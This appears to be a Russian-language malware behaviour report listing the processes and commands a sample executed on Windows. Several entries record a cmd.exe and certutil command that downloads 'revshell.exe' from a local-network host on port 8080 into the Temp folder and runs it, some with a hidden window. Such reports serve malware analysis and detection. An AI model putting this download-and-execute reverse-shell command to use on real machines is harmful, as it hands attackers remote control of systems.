Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -f http://19#.##8.100.1:8080/revshell.exe '%WINDIR%\Temp\revShell.exe' && C:\\Windows\\Temp\\revshell.exe
- '<LOCALNET>.100.1':8080
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil -urlcache -f http://19#.##8.100.1:8080/revshell.exe '%WINDIR%\Temp\revShell.exe' && C:\\Windows\\Temp\\revshell.exe' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -urlcache -f http://19#.##8.100.1:8080/revshell.exe '%WINDIR%\Temp\revShell.exe'